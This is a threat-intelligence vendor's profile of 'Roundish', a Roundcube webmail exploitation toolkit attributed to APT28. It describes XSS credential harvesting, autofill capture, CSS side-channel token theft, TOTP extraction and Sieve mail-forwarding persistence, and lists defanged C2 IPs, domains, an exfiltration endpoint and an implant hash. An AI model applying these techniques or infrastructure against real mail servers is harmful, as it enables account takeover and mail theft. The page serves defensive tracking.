Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareUsed by 2 actors

Roundish

Roundish is a Roundcube-focused exploitation toolkit and malware framework assessed with medium-high confidence to align with APT28 (Fancy Bear/Sednit), the Russian GRU-linked threat actor. Researchers identified an exposed open directory on 203.161.50[.]145:8889 in January 2026 containing a reportedly complete toolkit, including development and production XSS payloads, a Flask-based C2 server, CSS-injection tooling, operator bash history, and a Go-based Linux implant. The toolkit targets webmail, especially Roundcube, to harvest credentials, exfiltrate emails in bulk via the Roundcube viewsource API, steal address book contents, extract 2FA/TOTP secrets, and establish persistence through server-side Sieve mail-forwarding rules that redirect mail to advenwolf@proton[.]me. Roundish uses modular eval()-based JavaScript loading and base64-encoded exfiltration. Distinctive capabilities include an uncommon XSS technique that injects hidden username/password fields to capture browser password-manager autofill values, a CSS selector side-channel module (roundcube-css-exploit.js) for progressive extraction of DOM values such as CSRF tokens without JavaScript injection, and browser credential theft targeting Chrome and Firefox. Operator artifacts and infrastructure analysis confirmed active targeting of mail.dmsu.gov.ua, the Roundcube instance of Ukraine’s State Migration Service. Related infrastructure included a C2 server at 203.161.50[.]145 hosted on Namecheap infrastructure in Phoenix, Arizona; a primary C2 domain zhblz[.]com and subdomain a.zhblz[.]com used for the CSS side-channel server; and an Oracle Cloud pivot host at 130.61.233[.]105 in Frankfurt used for SSH pivoting. The exposed server also hosted a Flask C2 component (serverlast.py) that served a cloned Roundcube login page and captured credentials via /authentification.php before redirecting victims to a lure PDF named Adob_Scan_15_ian._2025.pdf. A Go-based Linux implant named httd (SHA-256: e76f54b7b98ba3a08f39392e6886a9cb3e97d57b8a076e6b948968d0be392ed8) was also found in exfiltrated data and provided persistence via cron, systemd, and SELinux policy manipulation.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
APT28

Roundish introduces additional components not previously documented in APT28 webmail activity, including a CSS-based side-channel module and browser credential theft capabilities.

via ctoatncsc substackctoatncsc.substack.com
APT29

In January 2026, we identified an exposed open directory ... that contained what appears to be a complete Roundcube exploitation toolkit... Roundish introduces additional components... including a CSS-based side-channel module and browser credential theft capabilities.

via huntio bloghunt.io
MITRE ATT&CK

Techniques & procedures

10 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

1 technique
T1595Active ScanningEvidence1

"The operator's bash history shows direct reconnaissance with curl mail.dmsu.gov.ua" and "RustScan was used for port scanning reconnaissance."

Resource Development

1 technique
T1583.001DomainsEvidence1

"The primary C2 domain zhblz[.]com ... was registered through NameCheap" and "The subdomain a.zhblz[.]com ... dedicated exclusively to the CSS injection side-channel attack"

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence2

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

Credential Access

2 techniques
T1111Multi-Factor Authentication InterceptionEvidence1

"keyTwoAuth.js module extracts TOTP secrets" and "exfiltrate TOTP secrets and create application passwords for MFA bypass"

T1649Steal or Forge Authentication CertificatesEvidence1

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

Discovery

1 technique
T1087.003Email AccountEvidence1

"Address book theft ... adbook.js contact extraction"

Collection

2 techniques
T1114Email CollectionEvidence1

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

T1114.003Email Forwarding RuleEvidence1

"create a server-side Sieve filter that redirects all incoming email to advenwolf@proton.me"

Exfiltration

2 techniques
T1041Exfiltration Over C2 ChannelEvidence1

The toolkit targets Roundcube webmail and supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and 2FA secret extraction.

T1567Exfiltration Over Web ServiceEvidence1

"HTTP POST to zhblz.com/zJ2w9x" and "/zJ2w9x/uploadfile/ POST Exfiltrated .eml file storage"

INDICATORS OF COMPROMISE

IOCs tracked for this family

12 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
12 tracked

IPs, domains, and DNS infrastructure linked to this family.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
ip.v4●●●●●●●●●●●●View more in app3 months ago
ACTIVITY FEED

Recent activity

2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

2 SOURCESView more in app
ctoatncsc substackNews
Mar 14, 2026
CTO at NCSC Summary: week ending March 15th

A toolkit associated with Roundcube exploitation that supports credential harvesting, mail forwarding, bulk email exfiltration, address book theft, 2FA secret extraction, and browser credential theft.

Read more
huntio blogNews
Mar 11, 2026
Operation Roundish: Uncovering an APT28 Roundcube Exploitation Toolkit Targeting Ukraine

A Roundcube-focused exploitation toolkit used to execute JavaScript XSS payloads for credential harvesting (including browser password-manager autofill abuse), bulk mailbox exfiltration via Roundcube APIs, address book theft, TOTP/2FA secret extraction, and creation of persistent server-side Sieve mail-forwarding rules to an operator-controlled mailbox. It also includes supporting C2/phishing infrastructure and a CSS selector side-channel module for token/DOM value extraction.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching12

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping10

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.